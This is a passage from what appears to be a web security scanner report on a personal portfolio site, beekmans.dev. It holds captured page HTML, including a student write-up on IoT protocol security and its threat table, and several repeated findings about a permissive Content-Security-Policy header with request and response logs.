          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
          <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
           <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
          <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
           </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
           <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          default-src 'self' http: https: data: blob: 'unsafe-inline'
          Solution

          Ensure that your web server, application server, load balancer, etc. is properly configured to set the Content-Security-Policy header.

        3. GET https://beekmans.dev/img/portfolio/Command%20injection.png
          Alert tags
          Alert description

          The following directives either allow wildcard sources (or ancestors), are not defined, or are overly broadly defined:

          script-src, style-src, img-src, connects-src, frame-src, frame-ancestors, font-src, media-src, object-src, manifest-src, worker-src, prefetch-src, form-action

          The directive(s): frame-ancestors, form-action are among the directives that do not fallback to default-src, missing/excluding them is the same as allowing anything.

          Request
          Request line and header section (261 bytes)
          GET https://beekmans.dev/img/portfolio/Command%20injection.png HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1068 bytes)
          HTTP/1.1 404 Not Found
          Date: Mon, 06 Dec 2021 09:55:14 GMT
          Content-Type: text/html; charset=iso-8859-1
          Connection: keep-alive
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: EXPIRED
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=i%2BFYG5W12JM5YDLzQ2SfX5VpQvsUdwoWEMSIdzTTzBAL2HNesY92WSs%2F2pad8b2CzNPe%2FPH%2B45xEIO1solf1k7jyiVPQJn6%2FBd7yP%2BvIp%2BMhr9jeBz2NOeeLsdZxYhQ%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a3317a0b4c43-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (275 bytes)
          <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
          <html><head>
          <title>404 Not Found</title>
          </head><body>
          <h1>Not Found</h1>
          <p>The requested URL was not found on this server.</p>
          <hr>
          <address>Apache/2.4.29 (Ubuntu) Server at beekmans.dev Port 443</address>
          </body></html>
          
          Evidence
          default-src 'self' http: https: data: blob: 'unsafe-inline'
          Solution

          Ensure that your web server, application server, load balancer, etc. is properly configured to set the Content-Security-Policy header.

        4. GET https://beekmans.dev/img/portfolio/Risk%20analysis.xlsx
          Alert tags
          Alert description

          The following directives either allow wildcard sources (or ancestors), are not defined, or are overly broadly defined:

          script-src, style-src, img-src, connects-src, frame-src, frame-ancestors, font-src, media-src, object-src, manifest-src, worker-src, prefetch-src, form-action

          The directive(s): frame-ancestors, form-action are among the directives that do not fallback to default-src, missing/excluding them is the same as allowing anything.

          Request
          Request line and header section (258 bytes)
          GET https://beekmans.dev/img/portfolio/Risk%20analysis.xlsx HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1055 bytes)
          HTTP/1.1 404 Not Found
          Date: Mon, 06 Dec 2021 09:55:14 GMT
          Content-Type: text/html; charset=iso-8859-1
          Connection: keep-alive
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: MISS
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VnmTC5S9vI1Ap4yQuSbEzhm60TfEapnyy%2F8WTXTOosGTh3p4kWgCcTLHqi1xup%2B5F1X6mQMKd9NxiqDn8tjHsNfhqs7ZRmkWYRt89HevOrUbayesOSv7qt9qiYqwW1c%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a32e6c874c43-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (275 bytes)
          <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
          <html><head>
          <title>404 Not Found</title>
          </head><body>
          <h1>Not Found</h1>
          <p>The requested URL was not found on this server.</p>
          <hr>
          <address>Apache/2.4.29 (Ubuntu) Server at beekmans.dev Port 443</address>
          </body></html>
          
          Evidence
          default-src 'self' http: https: data: blob: 'unsafe-inline'
          Solution

          Ensure that your web server, application server, load balancer, etc. is properly configured to set the Content-Security-Policy header.

        5. GET https://beekmans.dev/img/portfolio/Use%20Of%23.png
          Alert tags
          Alert description

          The following directives either allow wildcard sources (or ancestors), are not defined, or are overly broadly defined:

          script-src, style-src, img-src, connects-src, frame-src, frame-ancestors, font-src, media-src, object-src, manifest-src, worker-src, prefetch-src, form-action

          The directive(s): frame-ancestors, form-action are among the directives that do not fallback to default-src, missing/excluding them is the same as allowing anything.

          Request
          Request line and header section (253 bytes)
          GET https://beekmans.dev/img/portfolio/Use%20Of%23.png HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1070 bytes)
          HTTP/1.1 404 Not Found
          Date: Mon, 06 Dec 2021 09:55:14 GMT
          Content-Type: text/html; charset=iso-8859-1
          Connection: keep-alive
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: EXPIRED
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Gcaa9v%2BzLnhe%2BqZOh%2FFYjU42IJf%2FXfKOpExCiNSnf6Woglg33tgZoAE%2FzD1BHrCzee85zKajW86DWy%2BNhJslmJAfIoBVzaXiJgDAR%2BGCX6%2BAs8KJyDEZi4XaSpmLno4%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a330ba840c09-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (275 bytes)
          <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
          <html><head>
          <title>404 Not Found</title>
          </head><body>
          <h1>Not Found</h1>
          <p>The requested URL was not found on this server.</p>
          <hr>
          <address>Apache/2.4.29 (Ubuntu) Server at beekmans.dev Port 443</address>
          </body></html>
          
          Evidence
          default-src 'self' http: https: data: blob: 'unsafe-inline'
          Solution

          Ensure that your web server, application server, load balancer, etc. is properly configured to set the Content-Security-Policy header.

        6. GET https://beekmans.dev/PICTURE
          Alert tags
          Alert description

          The following directives either allow wildcard sources (or ancestors), are not defined, or are overly broadly defined:

          script-src, style-src, img-src, connects-src, frame-src, frame-ancestors, font-src, media-src, object-src, manifest-src, worker-src, prefetch-src, form-action

          The directive(s): frame-ancestors, form-action are among the directives that do not fallback to default-src, missing/excluding them is the same as allowing anything.

          Request
          Request line and header section (232 bytes)
          GET https://beekmans.dev/PICTURE HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev/
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1030 bytes)
          HTTP/1.1 404 Not Found
          Date: Mon, 06 Dec 2021 09:55:16 GMT
          Content-Type: text/html; charset=iso-8859-1
          Connection: keep-alive
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZB5VXGEczCgtihRRtv5%2BY5CLDJtrUafaXM4chTF9IsMlAnJjdq%2FTNXVU5zGLjSXD7%2BUP2yXnXdqmpb6qZa7pTOjotCp3Eo9cEYzXhMWNDmUsdhi9JLioxOhPGoDpKuc%3D"}],"group":"cf-nel","max_age":604800}
